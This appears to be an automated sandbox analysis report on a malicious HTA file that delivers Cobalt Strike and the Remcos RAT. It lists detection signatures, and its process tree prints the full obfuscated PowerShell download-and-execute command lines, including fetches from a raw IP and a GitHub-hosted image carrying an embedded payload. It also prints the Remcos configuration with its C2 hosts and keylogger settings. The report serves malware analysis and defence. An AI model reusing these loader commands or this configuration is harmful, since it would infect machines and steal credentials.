Edit tour
Windows
Analysis Report
nicetokissthebestthingsiwantotgetmebackwith.hta
Overview
General Information
Detection
Cobalt Strike, Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 1848 cmdline:
mshta.exe "C:\Users\ user\Deskt op\nicetok issthebest thingsiwan totgetmeba ckwith.hta " MD5: 06B02D5C097C7DB1F109749C45F3F505) - powershell.exe (PID: 4408 cmdline:
"C:\Window s\sysTEM32 \WInDOwSpo WershELL\v 1.0\pOWERS HELl.EXE" "pOweRSHel l.eXE -eX ByPASS -nOp -W 1 -C DeviC EcreDentIA LDePLoymEN t.Exe ; ie X($(iEx('[ sYstem.teX T.EnCodiNg ]'+[CHaR]0 X3A+[ChAr] 0X3a+'utf8 .geTStRIng ([SYSTem.c onVeRT]'+[ cHar]0X3a+ [cHAr]0x3a +'fRoMbAse 64STRINg(' +[chAr]0x2 2+'JFo4ViA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gPSAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgYUREL XRZcGUgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIC1 tRU1CRVJER WZJTmlUaW9 uICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAnW0Rsb EltcG9ydCg idVJMTU9OL mRMTCIsICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB DaGFyU2V0I D0gQ2hhclN ldC5Vbmljb 2RlKV1wdWJ saWMgc3Rhd GljIGV4dGV ybiBJbnRQd HIgVVJMRG9 3bmxvYWRUb 0ZpbGUoSW5 0UHRyICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBrR lJJT2lCTCx zdHJpbmcgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI G9DWWksc3R yaW5nICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBvc UxvWVAsdWl udCAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgTUR1a nZLSyxJbnR QdHIgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIENJW W9nV3RNZXI pOycgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIC1OY W1FICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAicXJ Va0NtTXZhT kgiICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAtbmF NZVNwQUNFI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBYZEJMQnd 6U21nZSAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgL VBhc3NUaHJ 1OyAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgJFo4V jo6VVJMRG9 3bmxvYWRUb 0ZpbGUoMCw iaHR0cDovL zEwNy4xNzU uMjI5LjEzO C81NTAvc2V ldGhlYmVzd HBpY3R1cmV 3aXRoZ3JlY XR0aGluZ3N pbmxpbmVhb HdheXMudEl GIiwiJEVud jpBUFBEQVR BXHNlZXRoZ WJlc3RwaWN 0dXJld2l0a GdyZWF0dGh pbmdzaW5sa W5lYS52YlM iLDAsMCk7c 1RhcnQtU0x FZVAoMyk7U 3RhclQgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICI kZW52OkFQU ERBVEFcc2V ldGhlYmVzd HBpY3R1cmV 3aXRoZ3JlY XR0aGluZ3N pbmxpbmVhL nZiUyI='+[ char]34+') )')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 2792 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 940 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -eX ByPASS -nOp -W 1 -C DeviCE creDentIAL DePLoymENt .Exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - csc.exe (PID: 4308 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\csc .exe" /noc onfig /ful lpaths @"C :\Users\us er\AppData \Local\Tem p\1nlzjhnh \1nlzjhnh. cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D) - cvtres.exe (PID: 1532 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\cvtr es.exe /NO LOGO /READ ONLY /MACH INE:IX86 " /OUT:C:\Us ers\user\A ppData\Loc al\Temp\RE SE985.tmp" "c:\Users \user\AppD ata\Local\ Temp\1nlzj hnh\CSC4E5 E770DE0064 29A8ABEBD7 2CF3EF132. TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0) - wscript.exe (PID: 1396 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\seeth ebestpictu rewithgrea tthingsinl inea.vbS" MD5: FF00E0480075B095948000BDC66E81F0) - powershell.exe (PID: 1732 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' LiggJFNoRU xMSWRbMV0r JHNoRWxMSU RbMTNdKydY JykoICgoJ3 sxfWltYWdl VXJsID0gez B9aHR0cHM6 Ly9yYXcuZ2 l0aHVidXNl cmNvbnRlbn QuY29tL0Ny eXB0ZXJzQW 5kVG9vbHNP ZicrJ2ljaW FsL1pJUC9y ZWZzL2hlYW RzL21haW4v RGV0YWhOb3 RlX1YuanBn IHswfTt7MX 13ZWJDbGll bnQgPSBOZX ctT2JqZWN0 IFN5c3RlbS 5OZXQuV2Vi Q2xpZW50O3 snKycxfWlt YWdlQnl0ZX MgPSB7MX0n Kyd3ZWJDbG llbnQuRG8n Kyd3bmxvYW REYXRhKHsx fWltYWdlVX JsKTt7MX1p bWFnZVRleH QgPSBbUycr J3lzdGVtLl RleHQuRW5j bycrJ2Rpbm ddOjpVVEY4 LkdldFN0cm luZyh7MX1p bWFnZUJ5dG VzKTt7MX1z dGFydEZsYW cgPSB7MH08 PEJBU0U2NF 9TVEFSVCcr Jz4+ezB9O3 sxfWVuZEZs YWcgPSB7MH 08PEJBU0U2 NF9FTkQ+Pn swfTt7MX1z dGFydEluZG V4ID0gezF9 aW1hZ2VUZX h0LkluZGV4 T2YoezF9c3 RhcnRGbGFn KTt7MX1lbm RJbmRleCA9 IHsxfWknKy dtYWdlVGV4 dC5JbmRlJy sneCcrJ09m KHsxfWVuJy snZEZsYWcp O3sxfXN0YX J0SW5kZXgg LWdlIDAgLW FuZCB7MX1l bmRJbmRleC AtZycrJ3Qn KycgezF9cy crJ3RhcnRJ bmRleDt7MX 1zdGFydElu ZGV4ICs9IH sxfXN0YXJ0 RmxhZy5MZW 5ndGg7ezF9 YmFzZTY0TG VuZ3RoID0g ezF9ZW5kSW 5kZXggLSB7 MX1zdGFydE luZGV4O3sx fWJhc2U2NE NvbW1hbmQg PSB7MX1pbW FnZVRleHQu U3Vic3RyaW 5nKHsxfXN0 YXJ0SW5kZX gsIHsxfWJh c2U2NExlbm d0aCk7ezF9 Y29tbWFuZE J5dGVzID0g W1N5c3RlbS 5Db252ZXJ0 XTo6RnJvbU Jhc2U2NFN0 cmluZygnKy d7MX1iYXNl NjRDb21tYW 5kKTt7MX1s b2FkZWRBc3 NlbWJseSA9 IFtTeXN0ZW 0uUmVmbGVj dGlvbi5Bc3 NlbWJseV0n Kyc6OkxvYW QoezF9Y29t bWFuZEJ5dG VzKScrJzt7 MX12YWlNZX Rob2QgPSBb ZG5sJysnaW IuSU8uSG9t ZV0uR2V0TW V0aG9kKHsw fVZBSXswfS k7ezF9dmFp TWV0aG9kLk ludm9rZSh7 MX1udWxsLC BAKHswfXR4 dC5SRENDTk 0vMDU1Lzgz MS45MjIuNT cxLjcwMS8v OnB0dGh7MH 0sIHswfWRl cycrJ2F0aX ZhZG97MH0s IHswfWRlc2 F0aXZhZG97 MCcrJ30sIH swfWRlc2F0 aXZhZG97MH 0sIHswfVJl Z0FzbScrJ3 swfSwgezB9 ZGVzYXRpdm Fkb3swfSwg ezB9ZGVzYX RpdmFkb3sw fSkpOycpIC AtRltjaEFS XTM5LFtjaE FSXTM2KSAp ';$OWjuxd = [system. Text.encod ing]::UTF8 .GetString ([system.C onvert]::F rombase64S tring($cod igo));powe rshell.exe -windowst yle hidden -executio npolicy by pass -NoPr ofile -com mand $OWju xD MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 2364 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1476 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and ".( $S hELLId[1]+ $shElLID[1 3]+'X')( ( ('{1}image Url = {0}h ttps://raw .githubuse rcontent.c om/Crypter sAndToolsO f'+'icial/ ZIP/refs/h eads/main/ DetahNote_ V.jpg {0}; {1}webClie nt = New-O bject Syst em.Net.Web Client;{'+ '1}imageBy tes = {1}' +'webClien t.Do'+'wnl oadData({1 }imageUrl) ;{1}imageT ext = [S'+ 'ystem.Tex t.Enco'+'d ing]::UTF8 .GetString ({1}imageB ytes);{1}s tartFlag = {0}<<BASE 64_START'+ '>>{0};{1} endFlag = {0}<<BASE6 4_END>>{0} ;{1}startI ndex = {1} imageText. IndexOf({1 }startFlag );{1}endIn dex = {1}i '+'mageTex t.Inde'+'x '+'Of({1}e n'+'dFlag) ;{1}startI ndex -ge 0 -and {1}e ndIndex -g '+'t'+' {1 }s'+'tartI ndex;{1}st artIndex + = {1}start Flag.Lengt h;{1}base6 4Length = {1}endInde x - {1}sta rtIndex;{1 }base64Com mand = {1} imageText. Substring( {1}startIn dex, {1}ba se64Length );{1}comma ndBytes = [System.Co nvert]::Fr omBase64St ring('+'{1 }base64Com mand);{1}l oadedAssem bly = [Sys tem.Reflec tion.Assem bly]'+'::L oad({1}com mandBytes) '+';{1}vai Method = [ dnl'+'ib.I O.Home].Ge tMethod({0 }VAI{0});{ 1}vaiMetho d.Invoke({ 1}null, @( {0}txt.RDC CNM/055/83 1.922.571. 701//:ptth {0}, {0}de s'+'ativad o{0}, {0}d esativado{ 0'+'}, {0} desativado {0}, {0}Re gAsm'+'{0} , {0}desat ivado{0}, {0}desativ ado{0}));' ) -F[chAR] 39,[chAR]3 6) )" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - RegAsm.exe (PID: 5940 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Asm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13) - RegAsm.exe (PID: 6412 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\RegA sm.exe /st ext "C:\Us ers\user\A ppData\Loc al\Temp\kw va" MD5: 0D5DF43AF2916F47D00C1573797C1A13) - RegAsm.exe (PID: 5412 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\RegA sm.exe /st ext "C:\Us ers\user\A ppData\Loc al\Temp\mq alwary" MD5: 0D5DF43AF2916F47D00C1573797C1A13) - RegAsm.exe (PID: 2000 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\RegA sm.exe /st ext "C:\Us ers\user\A ppData\Loc al\Temp\mq alwary" MD5: 0D5DF43AF2916F47D00C1573797C1A13) - RegAsm.exe (PID: 6512 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\RegA sm.exe /st ext "C:\Us ers\user\A ppData\Loc al\Temp\mq alwary" MD5: 0D5DF43AF2916F47D00C1573797C1A13) - RegAsm.exe (PID: 4564 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\RegA sm.exe /st ext "C:\Us ers\user\A ppData\Loc al\Temp\xs newtbsktv" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
{"Host:Port:Password": ["danbana.duckdns.org:9674:1", "danbana.duckdns.org:9764:1", "dantata.duckdns.org:9764:1", "dantata.duckdns.org:9674:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-UCDCW8", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
Click to see the 27 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
Click to see the 18 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security | ||
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |